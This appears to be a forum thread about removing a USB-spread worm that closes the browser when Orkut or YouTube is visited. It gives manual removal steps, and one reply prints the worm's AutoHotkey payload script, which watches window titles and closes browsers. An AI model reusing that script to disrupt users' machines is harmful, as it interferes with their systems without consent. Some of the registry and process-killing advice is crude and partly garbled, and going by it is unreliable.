This is the pop up text: "Orkut is banned you fool, The addministrators didnt write thisprogram guess who did?? MUHAHA!"
When I type Orkut or youtube webaddress in the address bar, a pop up appears and the internet explorer closes.
i can help u out in this matter just go through the below given steps
Here '*****' stands for ORKUT actually
**** is banned you fool,The administrators didnt write this program guess who did??
MUHAHAHA!!
If u are getting this dialogue box every time u try to open **** then ur computer is infected with w32.usbworm
This virus spreads by usb drives like pen drive etc.
Doesn't PANIC, this worm is a decent worm, which does not destroy your files or damage your computer.
Now How to remove it
Follow these steps
1. Press CTRL+ALT+DEL and go to the processes tab
2. Look for svchost.exe under the image name. There will be many but look for the ones which have your username under the username
3. Press DEL to kill these files. It will give you a warning, Press Yes
4. Repeat for more svchost.exe files with your username and repeat. Do not kill svchost.exe with system, local service or network service!
5. Now open My Computer
6. In the address bar, type C:\heap41a and press enter. It is a hidden folder, and is not visible by default.
7. Delete all the files
9. Now go to Start --%26gt; Run and type Regedit
10. Go to the menu Edit --%26gt; Find
11. Type "heap41a" here and press enter. You will get something like this "[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt"
12. Select that and Press DEL. It will ask "Are you sure you wanna delete this value", click Yes
13. Now close the registry editor
Now the virus is gone. But be sure to delete the autorun.inf file and any folder whose name ends with .exe in the pen drive.
Some reported that after this fix they were not able to see their Hidden folders and files if you have that issue try the folowing
1. Again go to REGEDIT
2. Go to "HKEY_LOCAL_MACHINE,SOFTWARE
\Microsoft\Windows\CurrentVers ion\Explorer\Advanced\ Folder\Hidden\SHOWALL, checkedvalue" And reset the "CheckedValue" key back to 1. This is to show all the hidden files.
3. Then navigate to "HKEY_LOCAL_MACHINE,SOFTWARE \Microsoft\Windows\CurrentVers ion\policies\Explorer\Run" and delete the "winlogon" key. --- This will stop the worm installing at the start up.
Reply:Lemme tell you how remove tat Bug(here Malware)
when you get that Message.
1. Go to the Task manager
2. click on the "Application" Tab ( if its not )
3. Right Click on the application that's Giving you the Messge %26gt; go
the Process.
4 as you can see there is "svchost.exe" Highlighted.
5. Right Click and Select "End Process Tree"
well this is for the Begginers. :)
if you really wanna get rid of the malware.
here is the deal..
there is a File called
"heap41a"
which is located in C:\heap41a.
This is the Script which i got it when i checked the file.
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA
BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
}
return
I notice that there are two websites which are been blocked...
1. Orkut
2. youtube
also i notice that there is a .mp3 file which lets the Sound to be
Played @ the end of the Display.
well.. who ever the person written this TCR its good for me since I
got some sound to scare small children :D..
hmmm what are you waiting for Guys, del that Folder C:\heap41a
if want to know more...
mail to ravi.w...@gmail.com
These days I'm busy since i have Exams running in my Head. :) if
possible I 'll tell you more.
bye..
Reply:its due to some virus.
u can get a virus removal tool for that.
nothing to worry.
search for that in internet.
it is a very a small file
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment